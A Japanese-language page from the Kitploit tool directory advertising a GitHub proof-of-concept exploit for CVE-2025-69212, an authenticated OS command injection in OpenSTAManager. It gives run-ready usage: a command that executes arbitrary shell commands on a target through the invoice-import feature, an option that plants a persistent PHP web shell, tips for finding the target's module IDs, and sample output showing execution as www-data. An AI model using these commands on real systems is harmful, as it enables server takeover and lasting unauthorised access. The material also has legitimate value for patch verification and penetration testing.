Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - OpenSTAManager OS コマンドインジェクション PoC | Kitploit
ツール/GitHubGitHub/alaeddine03/cve-2025-69212-poc
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager OS コマンドインジェクション PoC

リポジトリを見る
482ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-69212 - OpenSTAManager OSコマンドインジェクションのPoC

使い方

依存関係のインストール:

root@kitploit:~
pip install -r requirements.txt

単一のコマンドを実行し、その出力を表示する:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

代わりに永続的なPHPウェブシェルを配置する:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

オプション

フラグ説明
-u, --url対象インスタンスのベースURL
-U, --username認証用のユーザー名
-P, --password認証用のパスワード
-c, --command実行するコマンド、出力は pwn_out.txt に保存されます
--shell単一のコマンドを実行する代わりに、files/shell.php にPHPウェブシェルを配置します
--id-module請求書インポート機能のモジュールID(デフォルト: 14)
--id-plugin請求書インポート機能のプラグインID(デフォルト: 48)

id_module と id_plugin はインスタンスごとに異なります。デフォルトが機能しない場合は、ターゲットのWeb UIにログインし、電子請求書インポート機能に移動して、ブラウザのネットワークタブでリクエストパラメータを確認してください。

出力例

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
ツールをダウンロード